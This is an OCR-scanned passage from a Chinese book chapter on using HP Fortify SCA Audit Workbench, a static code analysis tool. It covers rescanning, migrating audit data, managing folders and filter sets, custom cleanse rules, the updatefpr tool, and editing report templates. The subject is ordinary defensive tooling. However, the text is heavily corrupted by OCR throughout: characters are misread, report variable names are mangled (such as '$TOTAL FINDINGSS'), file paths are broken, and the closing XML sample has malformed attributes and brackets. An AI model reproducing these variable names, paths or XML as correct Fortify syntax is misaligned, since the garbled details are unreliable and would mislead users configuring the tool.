Is this a J2EE Web application? 
Ges 
| ONo 


Does this program run with escalated privileges (i.e. administrator account, 
root user, account with access to sensitive data, etc.)? 


Q Yes 
ONo 


图 5-43 审计 指南 向 导 


四 为 希望 进行 审计 的 问题 类 型 选择 相关 参数 ， 然 后 单 击 Next (下 一 步 )。 

h) 单 击 Run Scan( 运 行 扫描 )。 

如 果 Fortify SCA 在 扫描 源 代码 时 过 到 任何 问题 ， 会 显示 Waming( 和 敬告) 对话 框 。 
i) 单 击 OK( 确 定 ) 继 续 。 

Audit Workbench 会 显示 FPR 文件 。 


3) 重新 扫描 项 目 

a) 打开 FPR 文件 。 

b) 单 击 Scan( 扫 描 )。 

系统 会 显示 Rescan Build ID( 重 新 扫描 Build ID) 对 话 框 。 

(可 选单 击 Update Project Translation( 更 新 项 目 转换 ) 以 重新 转换 该 项 目 。 

(可 选 ) 修 改 Fortify SCA 扫描 阶段 的 命令 行 选项 。 

(可 选 ) 单 击 Manage Rulepacks( 管 理 规则 包 ) 可 更 改 用 来 分 析 该 项 目的 规则 包 。 

通过 选中 或 清除 复 选 框 来 添加 或 删除 规则 包 。 

要 使 用 未 列 出 的 自 定义 规则 包 , 请 单 击 Add Custom Rulepack (添加 自 定义 规则 包 ), 浏览 
到 规则 包 文件 并 选中 ， 然 后 单 击 OK( 确 定 )。 

c) 单 击 Run Scan( 运 行 扫描 )。 

扫描 完成 后 ， 将 显示 FPR。 
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d) 将 新 结果 与 之 前 FPR 中 的 问题 进行 比较 ， 如 下 所 示 : 

要 显示 所 有 新 问题 ， 单 击 Al (全 部 ) 文 件 夹 选项 卡 ， 然 后 选择 Group by New Issue( 按 新 
问题 分 组 ) 选 项 。 

要 显示 已 删除 的 问题 ， 单 击 All (全 部 ) 文 件 夹 选项 卡 ， 然 后 选择 Options( 选 项 )， 再 选择 
Show Removed Items( 显 示 删 除 项 )。 

要 检查 此 FPR 中 存在 的 、 先 前 扫描 所 找到 的 项 目 ， 单 击 All (全 部 ) 文 件 夹 选项 卡 ， 然 后 
展开 Existing Issues( 现 有 问题 ) 组 。 


4) 打开 项 目 

打开 FPR 文件 : 

a) 打开 Audit Workbench。 

b) 选择 File( 文 件 )， 再 选择 Open Project( 打 开 项 目 )。 

c) 系统 会 显示 Choose Project( 选 择 项 目 ) 窗 口 。 

d) 浏览 到 FPR 文件 并 选中 ， 然 后 单 击 Open( 打 开 )。 

如 果 FPR 格式 为 Fortify SCA 版 本 4.5.1 或 更 早 的 版 本 ， 则 会 自动 显示 Migration( 迁 移 ) 
向 导 。 和 否则 ，FPR 会 显示 在 Audit( 审 计 ) 透 视图 中 。 按 照 《Fortify SCA 迁移 指南 》 中 的 说 明 ， 
先 迁 移 问 题 ID， 然 后 迁移 审计 数据 。 

2. 迁移 审计 信息 


Audit Workbench 版 本 5.0 改进 了 审计 数据 的 管理 方式 。 现在 , 已 在 用 户 界面 中 为 每 个 项 
目 基础 自 定义 并 配置 了 审计 数据 。 打 开 项 目 时 , 会 自动 显示 审计 数据 。 若 具有 自 定义 的 Audit 
Labels (审计 标签 )， 则 无 须 使 用 自 定义 审计 标签 信息 修改 Audit Workbench 和 Fortify Manager 
配置 文件 。 每 个 项 目 都 可 具有 一 组 唯一 的 标签 。 

在 先前 的 版 本 中 ， 审 计 员 只 能 将 预 配置 的 信息 添加 到 问题 中 。 对 于 Audit Workbench 实 
例 而 言 ， 审 计 标 签 和 值 都 是 静态 的 、 本 地 使 用 的 。 自 定义 Audit Labels (审计 标签 ) 时 ， 需 要 用 
户 手动 编辑 Audit Workbench 的 配置 文件 。 此 外 ， 还 必须 使 用 相同 的 自 定义 审计 标签 和 值 来 
手动 重新 配置 每 个 Audit Workbench 和 Fortify Manager 实例 。 

打开 版 本 4.5.1 或 更 早 版 本 的 FPR 文件 时 ， 会 自动 启动 Migration( 迁 移 ) 向 导 。 必 须 将 旧 
的 审计 数据 映射 到 新 的 Custom. Tags( 自 定义 标签 ) 特 性 。Fortify Software 建议 先 创建 版 本 5.0 
的 Custom Tags( 自 定义 标签 ) 和 Filter Sets( 过 滤器 组 )， 然 后 将 旧 的 审计 数据 映射 到 新 格式 。 
迁移 审计 信息 : 
1) 按照 上 一 节 的 说 明 ， 打 开 FPR 格式 版 本 4.5.1 或 更 早 版 本 。 
将 自动 保存 旧 的 FPR 备份 。 系 统 会 显示 Migration( 迁 移 ) 向 导 。 
2) 另外 ， 也 可 以 选择 一 个 迁移 模板 文件 。 
3) 单 击 Next( 下 一 步 )。 
4) 会 显示 Migrate Analysis Values (迁移 分 析 值 ) 窗 口 ， 如 图 5-44 所 示 。 
5) 将 旧 的 分 析 值 映射 到 新 值 。 
6) 另外 ， 也 可 以 选择 Filter Template( 过 滤器 模板 )。 注 意 : 只 会 导入 分 析 标签 的 值 。 要 使 
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过 滤器 、 文 件 夹 及 其 他 设置 ， 请 在 迁移 审计 信息 之 后 重新 导入 模板 。 
7) 单 击 Next( 下 一 步 )。 


Migration Wizard 


Migrate Analysis Values 


In 5.0, by default we have a simplified set of five Analysis values. 
Define a mapping from 4.5 Analysis values: 


Old Value: New Value: 


Not an Issue. Not an Issue. 
Reliability Issue Reliability Issue 
Unknown Unknown 

Bad Practice Suspicious 
Suspicious Suspicious 
Dangerous Suspicious 
Exploitable Exploitable 
Exploit Available. Exploitable 


Load analysis values from filter template: 
Cildepotlmainigoodies|TutorialljavalauditslwebgoatlR&D. Labels Fikers.xml 


[<Back J][ Next> ][ Fes ][ cancel 


图 5-44 迁移 分 析 值 窗口 


系统 会 显示 Migration Summary (迁移 摘要 ) 窗 口 ， 如 图 5-45 所 示 。 


Migration Wizard 


Migration Summary 


In 5,0, issues are dynamically assigned to folders based on fiter queries. This 4,5 project contains issues that were statically 
assigned to folders by the auditor. 


These folders wil have the following numbers of issues dynamically reassigned: 
Hot: 

Warning: 

Info: 


These issues will be marked with migration comments. To search for these issues, enter "commentuser:migrated" in the search 
box, 


[Z] Save migration settings: 


C:\Program Files\Fortify SoftwarelFortify SCAlCorelconfiglmigration-settings 


图 5-45 “迁移 摘要 ”窗口 
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8) 单 击 Finish( 完 成 )。 
573 配置 /设置 项 目 参数 


1. 理解 项 目 配置 和 过 滤器 组 


Fortify SCA 使 用 安全 编码 规则 包 和 自 定 义 规 则 包 来 分 析 源 代码 , 确定 其 中 是 否 包含 任何 
安全 漏洞 或 不 安全 的 编程 方式 。Fortify SCA 会 识别 每 个 潜在 的 漏洞 ， 并 将 其 视 为 一 个 问题 。 
然后 Fortify SCA 会 创建 一 个 FPR 文件 , 其 中 包含 关于 该 项 目 中 存在 的 全 部 问题 的 详细 信息 ， 
包括 源 代码 片段 和 位 置 的 详情 (如 文件 名 、 包 和 类 )。 一 个 FPR 文件 可 能 包含 许多 问题 。 

过 滤器 组 可 控制 Audit Workbench 如 何 显示 这 些 问 题 , 而 且 允 许 用 户 自 定义 以 下 项 目 设置 : 

Folders (文件 夹 )， 即 Issues (问题 ) 面 板 上 的 选项 卡 : 

。 显示 的 文件 夹 (选项 卡 ) 数 量 

。 每 个 文件 夹 的 名 称 和 属性 

Custom Tags ( 自 定义 标签 )， 即 Issue Summary (问题 摘要 ) 选 项 卡 上 的 审计 标签 : 

。 可 用 审计 字段 的 数量 

。 每 个 字段 的 名 称 和 值 

每 个 过 滤器 组 的 过 滤器 : 

* Visibility Filters( 可 见 性 过 滤器 )， 可 隐藏 问题 

* Folder Filters( 文 件 夹 过 滤器 )， 可 将 问题 分 类 整理 到 Issues( 问 题 ) 面 板 上 的 各 个 文件 夹 

中 

注意 : 版 本 4.5 及 更 低 版 本 中 的 Analysis and status (分 析 和 状态 ) 等 审计 标签 已 经 替换 为 

Custom Tags( 自 定义 标签 )。 


2. 保存 项 目 配 置 参数 
要 保存 项 目 配置 参数 ， 请 选择 Fortify Software 一 Save Audit Project (保存 审计 项 目 )。 
3. 管理 文件 夹 


Issues( 问 题 ) 面 板 上 的 选项 卡 称 为 “文件 夹 "。 可 为 每 个 项 目 自 定义 文件 来。 文件 夹 在 该 
项 目 内 有 效 ， 可 供 该 项 目 中 的 每 个 过 滤器 组 使 用 。 在 一 个 项 目 中 ， 不 同 的 过 滤器 组 之 间 的 文 
件 夹 属性 可 能 会 有 所 不 同 。 

新 建文 件 夹 的 步骤 如 下 : 

1) 选择 Fortify Software 一 Project Configuration( 项 目 配置 )。 屏 幕 中 将 显示 Project 
Configuration (项 目 配置 ) 对 话 框 。 

2) 单 击 Folder( 文 件 夹 ) 选 项 卡 。 

3) 从 Folders for Filter Set (过 滤器 组 的 文件 夹 ) 中 ， 选 择 下 列 选项 之 一 : 

All Folders (所 有 文件 夹 )， 创 建 可 在 每 个 过 滤器 组 中 显示 的 文件 夹 ; 

一 个 过 滤器 组 ， 创 建 的 文件 夹具 能 在 所 选 过 滤器 组 中 显示 。 

4) 添加 文件 夹 : 
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a) 单 击 Folders (文件 夹 ) 旁 的 +( 加 号 )。 

屏幕 上 将 显示 Create a New Folder( 新 建文 件 夹 ) 对 话 框 。 

b) 为 新 文件 夹 输入 一 个 名 称 , 然后 单 击 OK( 确 定 )。 该 文件 夹 将 显示 在 文件 夹 列表 的 底部 。 
(可 选 操作 ) 向 上 或 向 下 拖 动 该 文件 来， 以 改变 该 选项 卡 在 Issues( 问 题 ) 面 板 上 的 位 置 ， 在 


面板 中 会 按照 从 左 到 右 的 顺序 排列 。 


(可 选 操作 ) 选 择 Default( 默 认 ) 将 所 有 与 文件 夹 过 滤器 不 符 的 问题 放 到 此 文件 夹 中 。 
单 击 OK( 确 定 )。 
该 文件 夹 会 在 Issues( 问 题 ) 面 板 上 显示 为 一 个 选项 卡 。 如果 选择 了 Default( 默 认 )， 会 显示 


所 有 与 文件 夹 过 滤器 不 符 的 问题 。 


注意 : 要 将 问题 导入 此 文件 夹 ， 请 添加 一 个 以 新 文件 天 作为 目标 文件 天 过 滤器 。 

添加 文件 夹 的 步骤 如 下 : 

1) 选择 Fortify Software— Project Configuration( 项 目 配置 )。 

屏幕 中 将 显示 Project Configuration (项 目 配置 ) 对 话 框 。 

2) 单 击 Folder( 文 件 夹 ) 选 项 卡 。 

3) 从 Folders for Filter Set( 过 滤器 组 的 文件 夹 ) 中 ， 选 择 要 添加 该 过 滤器 的 过 滤器 组 。 
注意 : 选择 All Folders( 所 有 文件 夹 ) 选 项 ， 创 建 的 文件 夹 可 在 每 个 过 滤器 组 中 显示 。 

4) 单 击 Folders( 文 件 夹 ) 旁 的 +( 加 号 )。 

如 果 此 过 滤器 组 中 有 尚未 显示 的 文件 夹 ， 则 屏幕 上 将 显示 Add a new Folder to the Filter 


Set( 向 过 滤器 组 中 添加 新 文件 夹 ) 窗 口 。 


5) 选择 要 添加 的 文件 夹 ， 然 后 单 击 Select( 选 择 )。 

该 文件 夹 会 显示 在 文件 夹 列表 中 。 

6) 单 击 OK( 确 定 )。 

该 文件 夹 会 显示 在 Issues( 问 题 ) 面 板 中 ， 而 且 会 选中 修改 过 的 过 滤器 组 。 

重 命 名 文件 夹 的 步骤 如 下 : 

1) 选择 Fortify Software—Project Configuration( 项 目 配置 )。 屏 幕 中 将 显示 Project 


Configuration( 项 目 配置 ) 对 话 框 。 


2) 单 击 Folder( 文 件 夹 ) 选 项 卡 。 

3) 在 列表 中 选择 该 文件 来。 屏幕 上 将 显示 该 文件 夹 的 属性 。 

4) 为 该 文件 夹 输入 一 个 新 名 称 。 在 列表 中 ， 该 文件 夹 的 名 称 会 随 着 键入 而 改变 。 
5) 单 击 OK( 确 定 )。 

在 Issues( 问 题 ) 面 板 的 选项 卡 上 ， 该 文件 夹 的 名 称 也 会 随 之 改变 。 

删除 文件 夹 的 步骤 如 下 : 

1) 选择 Fortify Software Project Configuration( 项 目 配置 )。 

屏幕 中 将 显示 Project Configuration( 项 目 配置 ) 对 话 框 。 

2) 单 击 Folder( 文 件 夹 ) 选 项 卡 。 

3) 从 Folders for Filter Set (过 滤器 组 的 文件 夹 ) 中 ， 选 择 下 列 选项 之 一 : 

All Folders (所 有 文件 夹 ), 将 文件 夹 从 所 有 过 滤器 组 中 删除 。 如 果 此 文件 夹 是 某 个 文件 夹 


第 5 章 HPFortify 工具 使 用 *205* 


过 滤器 的 目标 ， 则 该 删除 文件 夹 的 选项 会 处 于 隐藏 状态 。 


一 个 过 滤器 组 ， 仅 将 该 文件 夹 从 所 选 过 滤器 组 删除 。 文 件 夹 列表 会 显示 所 选 过 滤器 组 中 


的 文件 夹 。 


4) 选择 该 文件 来， 然后 单 击 Folders (文件 夹 ) 旁 的 - ( 减 号 )。 
如 果 该 文件 夹 是 某 个 文件 夹 过 滤器 的 目标 , 则 屏幕 上 将 显示 Conflicts Occurred Removing 


a Folder( 删 除 文件 夹 时 出 现 冲 突 ) 窗 口 。 


5) 根据 需要 重新 设置 文件 夹 过 滤器 的 目标 或 删除 该 文件 夹 过 滤器 。 
该 文件 夹 便 会 从 文件 夹 列表 中 消失 。 

6) 单 击 OK( 确 定 )。 

该 文件 夹 将 不 再 在 Issues( 问 题 ) 面 板 上 显示 为 选项 卡 。 


5.714 Ti AR 


1. 使 用 Eclipse 导航 和 编辑 特性 


Audit Workbench 提供 了 源 代码 导航 和 编辑 特性 ， 这 些 特性 的 操作 方式 与 Eclipse 相同 。 
可 通过 以 下 方式 访问 这 些 特性 : 

Source( 源 ) 菜 单 ， 提 供 源 代码 的 编辑 和 格式 化 工具 ; 

Search( 搜 索 ) 菜 单 ， 提 供 关键 字 搜索 及 代码 导航 工具 ; 

Options( 选 项 ) 菜 单 中 的 Preferences( 首 选项 ) 选 项 ， 人 允许 自 定义 窗口 和 编辑 器 的 显示 方式 。 
2. 自 定义 问题 视图 


如 图 5-46 所 示 ， 可 以 从 Options 一 Interface Preferences( 选 项 一 界面 首选 项 ) 菜 单 中 设置 以 


下 选项 ， 以 自 定义 Issues( 问 题 ) 视 图 : 


Interface Preferences 
re niani Issue Rendering Preferences 
[Z] Show Suppressed Issues 
[Z] Show Removed Issues 
[Z] Show Hidden Issues 
[C Collapse Issues 
[7]Use Short File Names 
[E] Show Category of Issue 
Issue Summary Preferences 
[E] Show Abstract in Issue Summary 
[E] Show Comments in Issue Summary 


[C] Show Al! Folder in Issue Summary Graph 
[Right justify 'AT folder 
[Z] Display name in folder tabs 


EL] [ce] 
图 5-46 界面 首选 项 窗口 
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3. 合并 多 个 审计 员 的 审计 结果 


Audit Workbench 允许 多 个 审计 员 审计 某 个 相同 代码 的 各 个 部 分 ,然后 合并 审计 结果 。 要 
这 样 做 , 请 选择 Tools( 工 具 ), 再 选择 Merge Audits( 合 并 审计 ), 然后 导航 到 审计 项 目 文件 Cfpr) 
(其 中 包含 要 合并 到 当前 项 目 中 的 审计 后 的 问题 )。 

注意 : 仍 需要 进行 外 部 协调 ， 以 确保 不 同 的 问题 组 都 经 过 了 审计 。 如 果 对 相同 的 问题 进 
行 了 两 次 审计 ，Audit Workbench 会 发 出 警告 ， 并 允许 执行 以 下 其 中 一 项 操作 : 

1) 取消 合并 (未 做 更 改 )。 

2) 对 于 有 冲突 的 问题 ， 使 用 当前 审计 员 的 更 改 。 

4. 创建 自 定义 清除 规则 


Audit Workbench 允许 为 特定 的 函数 创建 自 定义 清除 规则 。 

创建 清除 规则 : 

1) 右键 单 击 函数 ， 打 开关 联 菜 单 。 

2) 选择 Write a Rule for This Function( 为 该 函数 编写 规则 )， 打 开 Custom Rules( 自 定义 规 
则 ) 向 导 。 

3) 选择 Generic Validation Rule( 一 般 验 证 规则 )。 

屏幕 将 显示 Select Language( 选 择 语言 ) 窗 口 。 

4) 选择 源 代码 的 语言 ， 然 后 单 击 Next( 下 一 步 )。 

5) 屏幕 将 显示 Function Information (函数 信息 ) 窗 口 。 

6) 系统 会 自动 植 入 所 选 函数 的 包 、 类 和 函数 名 。 

7) 验证 信息 是 否 正确 ， 然 后 单 击 Next( 下 一 步 )。 

屏幕 将 显示 Function Argument (函数 参数 ) 窗 口 。 

8) 选择 要 清除 的 参数 ， 然 后 单 击 Next( 下 一 步 )。 

屏幕 将 显示 Custom Rulepack Selection ( 自 定义 规则 包 选 择 ) 窗 口 。 

9) 选择 要 在 其 中 添加 规则 的 规则 包 。 

10) 单 击 OK( 确 定 )。 

5. 从 新 的 分 析 结 果 文 件 中 更 新 


如 果 对 某 个 分 析 结 果 文件 执行 了 审计 ， 随 后 对 源 文件 重新 运行 扫描 ， 则 可 以 用 新 分 析 结 
果 文 件 中 的 结果 来 更 新 利用 旧 分 析 结 果 文 件 创建 的 审计 项 目 文件 ， 且 不 会 丢失 先前 输入 的 审 
计 信 息 。 

利用 新 的 扫描 而 创建 的 分 析 结 果 来 更 新 审计 项 目 文件 : 

1) 打开 旧 的 审计 项 目 文件 。 

2) 选择 Tools( 工 具 )， 再 选择 Import New SCA Analysis (导入 新 的 SCA 分 析 )。 屏 幕 将 显 
示 Choose SCA Analysis File( 选 择 SCA 分 析 文 件 ) 窗 口 。 

3) 选择 新 的 分 析 结 果 文 件 。 

4) 选择 File( 文 件 )， 再 选择 Save As( 另 存 为 )， 然 后 将 新 的 分 析 结 果 文 件 另存 为 新 的 审计 
项 目 文件 。 
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也 可 以 使 用 updatefprjar 命令 行 工具 (可 在 不 启动 Audit Workbench 的 情况 下 执行 更 新 )， 
利用 新 的 分 析 结 果 文 件 更 新 审计 项 目 文件 。 
updatefprjar 命令 行 工具 位 于 以 下 目录 中 : 


«install directory»/Tools/updatefpr 
使 用 的 语法 如 下 : 
java -jar updatefpr.jar «new».fvdl old.fpr «new».fpr 


通常 ， 会 将 审计 数据 从 旧 的 扫描 复制 到 新 的 扫描 中 ， 方 法 是 使 这 两 次 扫描 中 的 漏洞 实例 
ID 相 匹 配 。 

不 过 ， 由 于 分 析 引 擎 中 发 生 更 改 ， 对 于 同一 种 逻辑 漏洞 ，Fortify SCA 4.5 实例 ID 可 能 不 
同 于 Fortify SCA 4.0 实例 ID， 从 而 导致 某 些 审计 数据 的 丢失 。 

对 于 同一 版 本 的 代码 基数 ， migrate audit data 可 将 审计 数据 从 Fortify SCA 4.0 FPR if 
移 到 Fortify SCA 4.5 FPR。 即 使 实例 ID 各 不 相同 ， 它 也 会 查看 漏洞 结构 以 确定 两 种 漏洞 是 
否 相同 。 

以 下 目录 包含 migrate audit data 和 README.txt 文件 (说 明 该 工具 的 用 法 ): 


«installation directory»/Tools/migrate audit data 


6. 导航 并 查看 分 析 结果 


在 打开 一 个 用 来 查看 Fortify SCA 所 检测 到 的 问题 的 AuditWorkbench 项 目 后 ， 可 在 
Summary( 摘 要 ) 面 板 中 审计 这 些 问题 ， 以 反映 这 些 问 题 的 严重 级 别 ， 以 及 对 该 问题 执行 的 安 
全 分 析 状态 。 

系统 会 按 审计 结果 的 严重 性 以 及 准确 性 ， 对 审计 结果 进行 分 组 ， 并 在 默认 情况 下 将 问题 
识别 为 位 于 Issues( 问 题 ) 面 板 中 的 Hot( 严 重 ) 列 表 内 。 单 击 Waming( 和 警告 ) 和 Info( 信 息 )， 查 看 
分 组 在 这 些 列表 中 的 问题 。 

每 个 列表 中 的 问题 数量 显示 在 相关 按钮 下 面 。 

要 检验 与 Issues( 问 题 ) 面 板 中 所 列 问题 相关 的 代码 ， 选 中 该 问题 。 源 代码 部 分 包含 显示 
在 源 代码 查看 器 面板 中 的 问题 ， 并 在 面板 的 标题 中 显示 文件 所 包含 问题 的 名 称 。 


57.5 生成 报告 


1. 打开 报告 模板 
1) 在 Audit Workbench 工具 栏 中 单 击 Reports (报告 )。 系 统 会 显示 Generate Reports( 生 成 
报告 ) 窗 口 。 


2) 从 Report( 报 告 ) 的 下 拉 列 表 中 选择 报告 模板 。Generate Report( 生 成 报告 ) 窗 口中 会 显示 
报告 模板 设置 。 
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2. 运行 报告 


选择 所 需 报告 模板 和 报告 设置 后 ， 即 可 生成 报告 以 查看 其 结果 。 可 将 报告 结果 另存 为 


PDF. RTF 和 XML 文件 。 


1) 在 Audit Workbench 工具 栏 中 单 击 Reports( 报 告 )。 
系统 会 显示 Generate Reports( 生 成 报告 ) 窗 口 。 

2) 从 Reports( 报 告 ) 下 拉 菜 单 中 选择 报告 模板 。 

3) 另外 ， 还 可 更 改 报告 一 节 的 设置 。 

4) "fiti Print Report( 打 印 报告 )。 

会 显示 保存 报告 的 对 话 框 。 

5) 指定 文件 名 称 和 保存 报告 的 位 置 。 

6) 选择 报告 的 文件 类 型 。 提 供 的 选项 有 PDF、RTF 或 XML。 
7) 单 击 Save( 保 存 )。 

已 生成 报告 并 另存 为 一 个 文件 。 

3. 使 用 报告 模板 

首次 安装 Fortify 产品 后 ， 下 拉 列 表 中 会 显示 Fortify 报告 模板 。 如 果 用 户 已 经 编辑 或 创 


建 了 其 他 默认 报告 模板 ， 可 能 无 法 查看 上 述 默认 报告 模板 。 


Fortify 报告 模板 包括 : 
Fortify 安全 报告 : 一 种 中 级 报告 ， 可 提供 有 关 所 执行 分 析 的 综合 信息 以 及 所 执行 审计 的 


高 级 详细 信息 。 还 可 为 优先 级 最 高 的 类 别提 供 高 级 说 明和 示例 。 


Fortify 开发 人 员工 作 手册 : 一 份 综合 列表 ， 其 中 列 出 了 已 找 到 的 所 有 问题 类 型 ， 并 为 每 


种 问题 列举 了 多 个 示例 。 它 还 为 每 种 类 别 的 问题 数目 提供 了 高 级 汇总 信息 。 


a 
里 


, 


可 选择 要 包含 在 报告 中 的 各 个 小 节 ， 还 可 以 编辑 各 小 节 显 示 的 内 容 。 

选择 要 包含 在 报告 中 的 各 个 小 节 : 

1) 在 左 侧 列表 中 色 选 每 个 小 节 标 题 的 复 选 杠 ， 即 可 将 其 包含 在 报告 中 。 

2) 单 击 小 节 标题 可 突出 显示 该 标题 。 

窗口 的 右 侧 会 显示 小 节 的 详细 信息 。 

要 从 报告 中 删除 某 个 小 节 ， 取 消 勾 选 小 节 标 题 旁 的 复 选 框 即 可 。 

选择 小 节 标 题 后 ， 便 可 以 编辑 在 报告 中 显示 的 内 容 。 可 以 编辑 文本 、 添 加 或 更 改 文本 变 
还 可 自 定义 图 标 或 结果 列表 中 显示 的 问题 。 

其 中 包括 : 

。 编辑 文本 子 小 节 

。 编辑 结果 列表 子 小 节 

。 编辑 图 表 子 小 节 

编辑 文本 子 小 节 : 

1) 勾 选 所 需 子 小 节 标 题 旁边 的 复 选 框 , 即 可 将 该 文本 包含 在 报告 中 。 子 小 节 标 题 下 方 会 


显示 对 文本 的 说 明 。 
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2) 单 击 Edit Text( 编 辑 文本 )。 文 本 框 中 会 显示 即将 会 包含 在 报告 中 的 文本 和 变量 。 
3) 根据 需要 编辑 文本 和 文本 变量 。 
编辑 文本 子 小 节 后 ， 可 以 插入 在 运行 报告 时 定义 的 变量 ， 如 表 5-10 所 示 。 


t B 
变 量 


表 5-10 文本 变量 
d £ 


SAUDIT GUIDE SUMMARYS 


列 出 通过 回答 Audit Guide (审计 指南 ) 的 问题 所 创建 的 过 滤器 


SCLASSPATH LISTINGS 


$COMMANDLINE ARGS$ 


扫描 过 程 中 使 用 的 JAR 文件 ， 每 行 一 个 相对 路 径 
命令 行 参数 的 完整 列表 (其 格式 与 项 目 汇 总 的 格式 相同 ) 


SFILE LISTING$ 


SFILTERSET DETAILS4 
SFILTERSET NAMES 
SFORTIFY SCA VERSIONS 
SLIBDIR. LISTING$ 

$LOCS 
SNUMBER OF FILESS 
$PROJECT BUILD LABELS 
SPROJECT NAMES 
SPROPERTIESS$ 

SRESULTS CERTIFICATIONS 
SRESULTS CERTIFICATION - 
SUMMARYS 


己 扫 描 文件 的 列表 ， 每 个 文件 的 格式 为 <relative filepath> # Lines # kb 
<timestamp> 

当前 过 滤器 组 正在 使 用 的 过 滤器 列表 

当前 过 滤器 组 的 名 称 

Fortify SCA 版 本 

扫描 过 程 中 指定 的 libdirs， 每 行 一 个 相对 路 径 

代码 总 行 数 

已 扫描 的 文件 总 数 

项 目的 内 部 版 本 标签 

Build ID 

分 析 阶 段 设置 的 属性 的 完整 列表 (其 格式 与 项 目 汇总 的 格式 相同 ) 
带 有 每 个 文件 的 有 效 性 列表 的 完整 认证 详情 (请 参见 项 目 汇总 ) 


用 于 描述 认证 的 短 句 (其 格式 与 项 目 汇总 的 格式 相同 ) 


SRULEPACKSS 


分 析 过 程 中 使 用 的 规则 包 的 完整 列表 (其 格式 与 项 目 汇总 的 格式 相同 ) 


$SCAN_ COMPUTER ID$ 


执行 扫描 操作 的 计算 机 主机 名 


$SCAN DATES 使 用 语言 环境 的 默认 格式 化 类 型 进行 的 分 析 的 日 期 
$SCAN SUMMARYS 已 扫描 代码 库 的 汇总 格式 为 # files, # lines of code 
SSCAN TIMES 分 析 阶 段 所 用 的 时 间 

SSCAN USERS 执行 扫描 的 用 户 名 

SSOURCE BASE PATHS 代码 库 的 源 库 路 径 


$TOTAL FINDINGSY 


找到 的 问题 总 数 ， 不 包括 已 废除 或 删除 的 问题 


SWARNINGSS$ 


已 出 现 的 警告 的 完整 列表 (其 格式 与 项 目 汇 总 的 格式 相同 ) 


SWARNING SUMMARYS 


扫描 过 程 中 发 现 的 警告 次 数 
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编辑 结果 列表 子 小 节 : 
1) 色 选 所 需 子 小 节 标题 旁 的 复 选 框 , 即 可 将 该 文本 包含 在 报告 中 。 子 小 节 标 题 下 方 会 显 
示 对 结果 列表 的 说 明 。 
2) 单 击 列 有 标题 的 问题 可 展开 各 个 选项 。 
3) 选择 将 按 其 对 结果 列表 进行 分 组 的 各 种 属性 。 如 果 选 择 按 类 别 进行 分 组 , 用 于 类 别 的 
建议 、 摘 要 和 解释 也 会 包含 在 报告 中 。 
4) 可 以 使 用 搜索 功能 细 化 该 子 小 节 中 显示 的 各 种 问题 。 查询 内 容 会 显示 在 Subsection( 子 
小 节 ) 字 段 的 Refine Issues ( 细 化 问题 ) 中 。 
5) 勾 选 或 清除 各 组 复 选 框 中 的 Limit number ofIssues( 有 限 数量 的 问题 )。 
6) 如 果 勾 选 了 该 复 选 框 ， 请 键入 每 个 组 中 显示 的 问题 数量 。 
编辑 图 表 子 小 节 : 
1) 勾 选 所 需 子 小 节 标 题 旁 的 复 选 框 , 即 可 将 该 文本 包含 在 报告 中 。 子 小 节 标题 下 方 会 显 
示 对 图 表 的 说 明 。 
2) 选择 按 其 对 图 表 进行 分 组 的 各 种 属性 。 
3) 可 使 用 搜索 功能 细 化 该 子 小 节 中 显示 的 各 种 问题 。 
查询 内 容 会 显示 在 Subsection( 子 小 节 ) 字 段 的 Refine Issues( 细 化 问题 ) 中 。 
4) 选择 图 表 类 型 。 图 表 类 型 包括 表格 、 直 方 图 和 人 饼 图 。 
4. 保存 报告 模板 


可 将 当前 报告 设置 男 存 为 新 的 模板 ， 以 便 日 后 选择 该 模板 运行 更 多 报告 。 

将 当前 报告 设置 另存 为 报告 模板 : 

1) 在 Audit Workbench 工具 栏 中 单 击 Reports( 报 告 )。 

系统 会 显示 Generate Reports( 生 成 报告 ) 窗 口 。 

2) 从 Report( 报 告 ) 下 拉 菜 单 中 选择 该 报告 模板 。 

3) 更 改 报 告 小 节 和 子 小 节 的 设置 。 

4) 单 击 Save as New Template( 另 存 为 新 模板 )。 

即 可 保存 为 新 的 报告 模板 。 当 从 报告 下 拉 菜单 中 选择 该 报告 模板 的 名 称 时 ， 该 模板 的 报 
告 设置 便 会 显示 在 Generate Report( 生 成 报告 ) 窗 口中 。 

5. 保存 对 报告 模板 的 更 改 


可 以 保存 对 报告 模板 的 更 改 ， 这 样 ， 当 前 的 新 设置 即 会 显示 为 默认 设置 。 

将 某 个 报告 模板 另存 为 默认 的 报告 模板 : 

1) Æ Audit Workbench 工具 栏 中 单 击 Reports( 报 告 )。 系 统 会 显示 Generate Reports( 生 成 
报告 ) 窗 口 。 

2) 从 Report( 报 告 ) 下 拉 菜 单 中 选择 要 另存 为 默认 报告 模板 的 模板 。 

3) 另外 ， 还 可 以 更 改 报 告 小 节 和 子 小 节 的 设置 。 

4) 单 击 Save Settings as Default( 另 存 为 默认 设置 )。 

下 次 打开 Generate Reports( 生 成 报告 ) 窗 口 时 ， 窗 口中 即 会 显示 该 报告 模板 的 设置 。 该 报 
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告 模板 的 名 称 显示 在 Report( 报 告 ) 下 拉 菜 单 的 顶端 。 
6. 编辑 报告 模板 XML 文件 


报告 模板 会 另存 为 XML 文件 。 可 以 编辑 这 些 XML 文件 ， 以 做 出 更 改 或 创建 新 的 报告 
模板 文件 。 编 辑 XML 文件 时 ， 可 以 选择 要 包含 在 报告 模板 中 的 各 个 小 节 和 每 个 小 节 的 内 容 。 
报告 模板 XML 文件 的 默认 位 置 为 : 


«install directory»/Core/config/reports 


通过 在 该 目录 中 指定 路 径 或 更 改 headerpng 和 footerpng, 还 可 以 自 定义 报告 中 使 用 的 标 
识 语 。 

可 通过 编辑 XML 文件 来 添加 报告 小 节 。 在 XML 的 结构 中 ，ReportSection 标签 可 定义 
一 个 新 的 小 节 。 在 定义 的 新 小 节 中 ，Title 标签 定义 了 小 节 名 称 ， 其 中 必须 至 少 包括 一 个 
Subsection 标签 ， 用 于 在 报告 中 定义 该 小 节 的 内 容 。 以 下 是 Fortify 安全 报告 中 Results Outline 
小 节 的 XML 代码 : 


<ReportSection enabled-"false" optionalSubsections="true"> 

«Title»Results Outline</Title> 

«SubSection enabled-"true"» 

«Title»Overall number of resultsc/Title» 

«Description»Results count«/Description» 

«Text»The scan found $TOTAL FINDINGSS issues.«/Text» 

«/SubSection» 

«SubSection enabled-"true"» 

«Title»Vulnerability Examples by Category«/Title» 

«Description»Results summary of the highest severity issues. 
Vulnerability examples are provided by category.«/Description» 

XIssueListing limit-"1" listing-"true"» 

«Refinement»severity: (3.0, 5.0] confidence: [4.0, 5.0]«/ 


Refinement» 
«Chart chartType-"list"» 
«Axis»Category«/Axis» 
